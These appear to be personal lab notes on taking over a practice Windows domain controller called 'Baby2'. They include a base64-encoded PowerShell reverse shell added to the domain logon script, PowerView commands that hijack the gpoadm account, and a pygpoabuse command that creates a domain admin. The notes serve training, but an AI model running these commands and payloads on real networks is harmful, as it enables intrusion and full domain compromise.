Baby2

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows

Chain: False

Credentials

Username	Password	Method	Scope
Carl.Moore	Carl.Moore	rid-bruteforce	domain user
office	office	rid-bruteforce	domain user

✅ Valid Usernames

gpoadm
office
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library
legacy

🔑 Passwords list

Information Gathering

# Nmap 7.94SVN scan initiated Thu Apr  3 20:49:16 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_baby2_tcp_allports -vvv 10.10.68.84
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 00:54:42Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51163/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51183/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51198/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Service Enumeration

DNS

• Not vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

• Server allows null session

• Server allows guest user access

  • Read,Write access homes directory.

• Username as password brute forcing revealed Carl.Moore and office as valid credentials

  • Can read and write in apps, docs, home

LDAP

• Allows userenumeration via rid-bruteforcing

• Not kerberoasting user

• Not asreproasting user

• Not information withing the users' description field

Initial enumeration

During the assessment, the tester discovered that the domain user carl.moore has read and write access to the following SMB shares:

• \\DC\apps

• \\DC\docs

• \\DC\homes

In addition, the user has read-only access at the SMB share level to the NETLOGON and SYSVOL shares:

nxc smb 10.10.68.84 -u Carl.Moore -p 'Carl.Moore' --shares
SMB         10.10.68.84     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.68.84     445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.10.68.84     445    DC               [*] Enumerated shares
SMB         10.10.68.84     445    DC               Share           Permissions     Remark
SMB         10.10.68.84     445    DC               -----           -----------     ------
SMB         10.10.68.84     445    DC               ADMIN$                          Remote Admin
SMB         10.10.68.84     445    DC               apps            READ,WRITE      
SMB         10.10.68.84     445    DC               C$                              Default share
SMB         10.10.68.84     445    DC               docs            READ,WRITE      
SMB         10.10.68.84     445    DC               homes           READ,WRITE      
SMB         10.10.68.84     445    DC               IPC$            READ            Remote IPC
SMB         10.10.68.84     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.68.84     445    DC               SYSVOL          READ            Logon server share 

However, further enumeration revealed that the user has write access at the NTFS level to the following file:

\\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs

This file is executed by domain users during the logon process (as confirmed via BloodHound enumeration or logon script analysis). This creates a high-impact attack vector where an unprivileged domain user can modify the login.vbs file to execute arbitrary code in the context of other domain users, potentially including privileged accounts such as domain administrators.

Reverse Shell via GPO Script

To exploit this misconfiguration, the tester appended the next lines to the script:

Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuA
DUALgA0ADgAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzAD
UAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADs
AJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcA
KAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAa
wAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZA
BpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB
5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Finally, uploaded the file by rewriting original file and wait for the reverse shell.

smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (4.7 kb/s) (average 4.7 kb/s)

Lateral movement from Amelia to gpoadmin

During post-compromise enumeration, the tester identified that the user Amelia.Griffiths had the ability to modify gpoadm via the following Active Directory permissions: WriteOwner WriteDACL These permissions allowed the tester to fully take over the gpoadm account and reset its password, thereby achieving lateral movement.

PS C:\temp> Import-Module .\PowerView.ps1
PS C:\temp> Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity Amelia.Griffiths -Verbose
PS C:\temp> Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All -Verbose
PS C:\temp> Set-DomainUserPassword -Identity gpoadm -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose

As a stealthier option, instead of resetting the password, the tester could have injected a custom msDS-KeyCredentialLink attribute using whisker.exe to retrieve the NT hash of the gpoadm account without altering the password. This method is particularly effective in environments using Windows Hello for Business.

Compromise Domain Controller

Finally the tester compromised an user with possess administration privilege over the GPO in the entire Domain controller that means Compromise domain.

The tester leveraged GPO capabilities to escalate privileges by adding a domain user to the Administrators group on the Domain Controller using pygpoabuse.py.

#Obtain GPO-ID
PS C:\temp> Get-GPO -all

#GPO Abuse tool
❯ python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -dc-ip 10.10.68.84 -gpo-id '6ac1786c-016f-11d2-945f-00c04fb984f9'
SUCCESS:root:ScheduledTask TASK_5cdfc77f created!
[+] ScheduledTask TASK_5cdfc77f created!

#Update the GPO's
PS C:\temp> Gpupdate /force

The tester authenticated as john (now Domain Admin) and confirmed full control:

❯ nxc smb 10.10.68.84 -u 'john' -p 'H4x00r123..'
SMB         10.10.68.84     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.68.84     445    DC               [+] baby2.vl\john:H4x00r123.. (Pwn3d!)